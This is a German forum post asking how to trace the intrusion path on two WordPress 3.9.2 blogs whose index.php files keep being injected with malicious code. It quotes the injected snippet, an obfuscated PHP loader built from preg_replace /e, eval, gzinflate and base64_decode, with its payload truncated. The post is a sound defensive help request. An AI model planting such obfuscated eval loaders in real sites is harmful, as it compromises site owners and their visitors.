Hallo Leute, ich habe mal eine Frage und suche einen Ansatz zum Suchen.
Ein Bekannter von mir hat zwei WordPress Blog Systeme die aktuell auf v3.9.2 basieren.
Er hat regelmäßig das Problem, dass seine index.php im root-Verzeichnis der Domain und die index.php vom Theme (und auch andere Dateien) mit einem Schadhaften Code verändert werden.
Sobald ich diese Dateien mit meinem FTP Client downloade, meckert mein NOD32 Virenscanner sofort rum und möchte diese Dateien am liebsten sofort löschen. Der Code sieht dann ungefähr so aus...
Jetzt ist nur die Frage, wie finde ich denn heraus WIE man in das System kommt? Ich weiß, dass WordPress nicht gerne gesehen wird und viele darüber immer wieder meckern. Aber er ist sehr zufrieden damit, mit Ausnahme dieser Lücke und ich wollte mal schauen ob ich ihm dabei helfen kann.
Gruß, Domi
Ein Bekannter von mir hat zwei WordPress Blog Systeme die aktuell auf v3.9.2 basieren.
Er hat regelmäßig das Problem, dass seine index.php im root-Verzeichnis der Domain und die index.php vom Theme (und auch andere Dateien) mit einem Schadhaften Code verändert werden.
Sobald ich diese Dateien mit meinem FTP Client downloade, meckert mein NOD32 Virenscanner sofort rum und möchte diese Dateien am liebsten sofort löschen. Der Code sieht dann ungefähr so aus...
PHP-Code:
<?php error_reporting(0); preg_replace("/.*e", "eval(gzinflate(base64_decode('TVfHDsRIb ... w==')));", ""); ?>
Gruß, Domi